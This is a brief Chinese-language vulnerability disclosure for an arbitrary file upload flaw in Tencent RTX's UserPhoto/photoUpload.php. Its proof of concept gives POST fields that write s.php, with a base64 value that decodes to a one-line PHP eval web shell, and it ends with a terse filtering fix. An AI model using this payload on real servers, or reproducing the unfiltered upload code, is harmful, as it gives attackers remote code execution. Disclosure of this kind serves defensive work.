安装RTX后打开IP:8012网址

 
腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞
 
 
详细说明:
 
简单的一个post表单即可上传
$user_account = $_POST[‘user_account’];
$file_name = $_POST[“file_name”];
$file_data = $_POST[“file_data”];
无任何过滤
漏洞证明:
 
user_account=1000
file_name=s.php
file_data=PD9waHAgZXZhbCgkX1BPU1Rbc2JdKT8+
file_data为base64_encode数据
post提交后UserPhoto目录下生成PhotoFiles/s.php
需要extension=php_mbstring.dll开启及php4
修复方案:
 
上传过滤